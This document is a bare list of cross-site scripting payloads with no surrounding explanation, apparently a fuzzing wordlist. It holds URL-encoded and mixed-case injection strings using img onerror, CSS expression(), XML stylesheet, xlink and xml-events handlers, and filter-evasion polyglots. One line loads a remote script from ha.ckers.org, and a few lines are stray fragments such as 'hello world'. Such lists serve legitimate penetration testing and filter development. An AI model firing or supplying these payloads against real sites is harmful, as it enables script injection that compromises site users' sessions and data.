%22%3E%3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E
'%3E%3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E
%3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E
%22%3E%3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E
'%3E%3Cobject%20allowscriptaccess=%22always%22%20data=%22test.swf%22%3E%3C/object%3E
%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E
%22%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E
'%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(alert(1))%7D%3C/style%3E
%3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E
%22%3E%3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E
'%3E%3Cx%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20xlink:actuate=%22onLoad%22%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22/%3E
%3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,%7bx:expression(write(1));%7d%22?%3E
%22%3E%3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,%7bx:expression(write(1));%7d%22?%3E
'%3E%3C?xml-stylesheet%20type=%22text/css%22%20href=%22data:,*%7bx:expression(write(1));%7d%22?%3E
%3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E
%22%3E%3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E
'%3E%3Cx:template%20xmlns:x=%22http://www.wapforum.org/2001/wml%22%20%20x:ontimer=%22$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)%22%3E%3Cx:timer%20value=%221%22/%3E%3C/x:template%3E
%3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)//
%22%3E%3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)//
'%3E%3Cx%20xmlns:ev=%22http://www.w3.org/2001/xml-events%22%20ev:event=%22load%22%20ev:handler=%22javascript:alert(1)//
'%3E%3Cbody%20oninput=alert(1)%3E%3Cinput%20autofocus%3E%3Cdiv%20id=%221%22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E
%22%3E%3Cbody%20oninput=alert(1)%3E%3Cinput%20autofocus%3E%3Cdiv%20id=%221%22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E
<img src="/" alt=""onerror=alert(1)>
<img
src="/" alt=""onerror=alert(1)>
<iMg Src="/" alt=""oNerror=alert(1)>
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))
alt=xzx
hello world
hello
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))
alt=xzx
ONERROR=alert(1)
hhh
<img src="xz" onerror alert(1)>
<img src="xz" onerror alert(1)> /
<img src="xz"
<"img alt="xz" onerror="alert(1): 100%;">"
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
![]()
xxs link xxs link![]()
<SCRIPT>alert("XSS")</SCRIPT>">